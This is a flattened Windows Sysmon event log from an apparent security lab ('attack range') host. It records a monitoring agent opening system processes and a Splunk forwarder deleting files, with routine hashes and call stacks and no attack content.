Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0A00-00000000AF02}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.594{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0A00-00000000AF02}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.594{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0A00-00000000AF02}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.592{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.592{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.592{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0A00-00000000AF02}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.592{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0A00-00000000AF02}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.589{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.589{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000048890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.343{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FB5D959EB69F4C703ED5E71EB2F7526,SHA256=EB9CD92D1F85B53059E6E86D2406D9BF9BF6C0E5AD1C41ACEFA338E2EE9748D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019154Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:34.074{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13F7C9492361B5075C607D132DDD175B,SHA256=A6DC322732A6F1B7BB6081903E375D69FF198836C54C1DCEA4CF984A8D15E582,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.176{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.174{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000019155Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:35.173{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CB2AA6D54C1D5B4E11A820684E6846D,SHA256=DE9F7D07C140E8D056DA5C755CB83D9B38644018FC85DE4788AC4A7FCCCEB246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:35.475{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62497C8D919BF064F27705F08566A97F,SHA256=3A3F2F7A58B2A38803BC1AC998AFE1A8C58EF5BAC16535FE39AFFDE4FE300AD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:35.309{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610)